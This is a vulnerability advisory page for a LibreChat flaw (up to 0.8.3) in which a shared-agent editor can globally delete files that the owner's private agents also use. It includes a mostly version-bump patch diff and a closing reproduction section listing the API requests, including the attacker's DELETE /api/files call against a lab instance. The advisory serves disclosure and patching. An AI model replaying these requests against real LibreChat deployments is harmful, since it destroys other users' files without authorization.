CVE-2026-44654
Description
LibreChat versions up to 0.8.3 allow a shared-agent editor to globally delete files, breaking the owner's other private agents that reuse the same file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
LibreChat versions up to 0.8.3 allow a shared-agent editor to globally delete files, breaking the owner's other private agents that reuse the same file.
Vulnerability
LibreChat versions up to and including 0.8.3 contain a vulnerability where a user with agent_editor role on a shared agent can delete file records globally via the DELETE /api/files endpoint. This deletion is not scoped to the agent context, meaning if an owner reuses a file across multiple agents (one shared, one private), an editor of the shared agent can delete that file, rendering it inaccessible to the owner's private agent.
Exploitation
An attacker requires agent_editor access to a shared agent. The attacker first needs to know or discover a file_id that the owner has reused across both the shared agent and one of the owner's private agents. The attacker then sends a DELETE /api/files request, providing the file_id and filepath, which globally removes the file record. This action requires no interaction from the owner and can be performed remotely.
Impact
Successful exploitation results in a cross-agent integrity violation. The owner's private agents that reference the deleted file_id will retain a stale reference, causing them to break silently. The attacker gains no direct access to the owner's private agents or data, but can disrupt the owner's workflow by making files used in their private agents unavailable.
Mitigation
LibreChat version 0.8.4 contains a patch for this vulnerability. Users are advised to upgrade to version 0.8.4 or later. No workarounds are available other than upgrading. The vulnerability was verified against LibreChat v0.8.3 [1].
AI Insight generated on Jun 3, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
10736ff26686e✨ v0.8.4 (#12339)
15 files changed · +1112 −284
api/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "@librechat/backend", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "description": "", "scripts": { "start": "echo 'please run this from the root directory'",
bun.lock+1090 −262 modifiedclient/jest.config.cjs+1 −1 modified@@ -1,4 +1,4 @@ -/** v0.8.4-rc1 */ +/** v0.8.4 */ module.exports = { roots: ['<rootDir>/src'], testEnvironment: 'jsdom',
client/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "@librechat/frontend", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "description": "", "type": "module", "scripts": {
Dockerfile+1 −1 modified@@ -1,4 +1,4 @@ -# v0.8.4-rc1 +# v0.8.4 # Base node image FROM node:20-alpine AS node
Dockerfile.multi+1 −1 modified@@ -1,5 +1,5 @@ # Dockerfile.multi -# v0.8.4-rc1 +# v0.8.4 # Set configurable max-old-space-size with default ARG NODE_MAX_OLD_SPACE_SIZE=6144
e2e/jestSetup.js+1 −1 modified@@ -1,3 +1,3 @@ -// v0.8.4-rc1 +// v0.8.4 // See .env.test.example for an example of the '.env.test' file. require('dotenv').config({ path: './e2e/.env.test' });
helm/librechat/Chart.yaml+2 −2 modified@@ -15,15 +15,15 @@ type: application # This is the chart version. This version number should be incremented each time you make changes # to the chart and its templates, including the app version. # Versions are expected to follow Semantic Versioning (https://semver.org/) -version: 2.0.1 +version: 2.0.2 # This is the version number of the application being deployed. This version number should be # incremented each time you make changes to the application. Versions are not expected to # follow Semantic Versioning. They should reflect the version the application is using. # It is recommended to use it with quotes. # renovate: image=registry.librechat.ai/danny-avila/librechat -appVersion: "v0.8.4-rc1" +appVersion: "v0.8.4" home: https://www.librechat.ai
package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "LibreChat", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "description": "", "packageManager": "npm@11.10.0", "workspaces": [
package-lock.json+8 −8 modified@@ -1,12 +1,12 @@ { "name": "LibreChat", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "LibreChat", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "license": "ISC", "workspaces": [ "api", @@ -46,7 +46,7 @@ }, "api": { "name": "@librechat/backend", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "license": "ISC", "dependencies": { "@anthropic-ai/vertex-sdk": "^0.14.3", @@ -430,7 +430,7 @@ }, "client": { "name": "@librechat/frontend", - "version": "v0.8.4-rc1", + "version": "v0.8.4", "license": "ISC", "dependencies": { "@ariakit/react": "^0.4.15", @@ -43808,7 +43808,7 @@ }, "packages/api": { "name": "@librechat/api", - "version": "1.7.26", + "version": "1.7.27", "license": "ISC", "devDependencies": { "@babel/preset-env": "^7.21.5", @@ -43928,7 +43928,7 @@ }, "packages/client": { "name": "@librechat/client", - "version": "0.4.55", + "version": "0.4.56", "devDependencies": { "@babel/core": "^7.28.5", "@babel/preset-env": "^7.28.5", @@ -45752,7 +45752,7 @@ }, "packages/data-provider": { "name": "librechat-data-provider", - "version": "0.8.400", + "version": "0.8.401", "license": "ISC", "dependencies": { "axios": "^1.13.5", @@ -45810,7 +45810,7 @@ }, "packages/data-schemas": { "name": "@librechat/data-schemas", - "version": "0.0.39", + "version": "0.0.40", "license": "MIT", "devDependencies": { "@rollup/plugin-alias": "^5.1.0",
packages/api/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "@librechat/api", - "version": "1.7.26", + "version": "1.7.27", "type": "commonjs", "description": "MCP services for LibreChat", "main": "dist/index.js",
packages/client/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "@librechat/client", - "version": "0.4.55", + "version": "0.4.56", "description": "React components for LibreChat", "repository": { "type": "git",
packages/data-provider/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "librechat-data-provider", - "version": "0.8.400", + "version": "0.8.401", "description": "data services for librechat apps", "main": "dist/index.js", "module": "dist/index.es.js",
packages/data-provider/src/config.ts+1 −1 modified@@ -1744,7 +1744,7 @@ export enum TTSProviders { /** Enum for app-wide constants */ export enum Constants { /** Key for the app's version. */ - VERSION = 'v0.8.4-rc1', + VERSION = 'v0.8.4', /** Key for the Custom Config's version (librechat.yaml). */ CONFIG_VERSION = '1.3.6', /** Standard value for the first message's `parentMessageId` value, to indicate no parent exists. */
packages/data-schemas/package.json+1 −1 modified@@ -1,6 +1,6 @@ { "name": "@librechat/data-schemas", - "version": "0.0.39", + "version": "0.0.40", "description": "Mongoose schemas and models for LibreChat", "type": "module", "main": "dist/index.cjs",
Vulnerability mechanics
Root cause
"The file deletion endpoint does not scope deletions to the requesting agent, allowing global removal of shared file records."
Attack vector
An attacker with the `agent_editor` role on a shared agent can exploit this vulnerability. The attacker must first ensure the owner has uploaded a file to the shared agent and then reused the same `file_id` in one of their private agents. The attacker then sends a `DELETE /api/files` request, specifying the `file_id` that is also used by the owner's private agent. This action globally removes the file record, breaking the owner's private agent.
Affected code
The vulnerability lies within the `DELETE /api/files` endpoint, which is responsible for removing file records. The advisory indicates that this endpoint removes file records by `file_id` without considering the agent context from which the request originates [ref_id=1].
What the fix does
The patch, released in version 0.8.4 [patch_id=4549435], addresses the vulnerability by ensuring that file deletions are scoped to the requesting agent's context. This prevents an editor of a shared agent from deleting files that are also referenced by the owner's private agents. The fix prevents cross-agent integrity violations by enforcing proper access controls on file resource management.
Preconditions
- authAttacker must have `agent_editor` role on a shared agent.
- inputOwner must have uploaded a file to a shared agent and reused the same `file_id` in a private agent.
Reproduction
Verified against LibreChat v0.8.3 Docker lab on 2026-03-17. Prerequisites: Admin account with agents enabled. Set LIBRECHAT_ADMIN_EMAIL and LIBRECHAT_ADMIN_PASSWORD. # Run the full PoC script: export LIBRECHAT_ADMIN_EMAIL="admin@lab.test" export LIBRECHAT_ADMIN_PASSWORD="AdminPass123!" export LIBRECHAT_BASE_URL="http://127.0.0.1:3080" python3 targets/librechat/pocs/shared_agent_file_global_delete.py Step-by-step reproduction:
Admin creates two agents — one shared, one private:
POST /api/agents {"name":"shared-file-agent",...} → shared_agent_id POST /api/agents {"name":"private-file-agent",...} → private_agent_id
Admin uploads a file to the shared agent:
POST /api/files (multipart: endpoint=agents, agent_id=shared_agent_id, file=lab.txt) → {"file_id":"9c393c08-...","filepath":"files/..."}
Admin reuses the same file_id on the private agent:
PATCH /api/agents/{private_agent_id} {"tool_resources":{"context":{"file_ids":["9c393c08-..."]}}}
Admin shares the shared agent with the attacker as agent_editor:
PUT /api/permissions/agent/{object_id} {"updated":[{"id":"attacker_id","accessRoleId":"agent_editor"}]}
Attacker deletes the file through /api/files (the cross-agent destructive action):
DELETE /api/files -H "Authorization: Bearer $ATTACKER_TOKEN" -d '{"files":[{"file_id":"9c393c08-...","filepath":"files/..."}],"agent_id":"shared_agent_id","tool_resource":"context"}'
Owner's private agent is now broken:
GET /api/files/agent/{private_agent_id} → file_id "9c393c08-..." is GONE — globally deleted
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.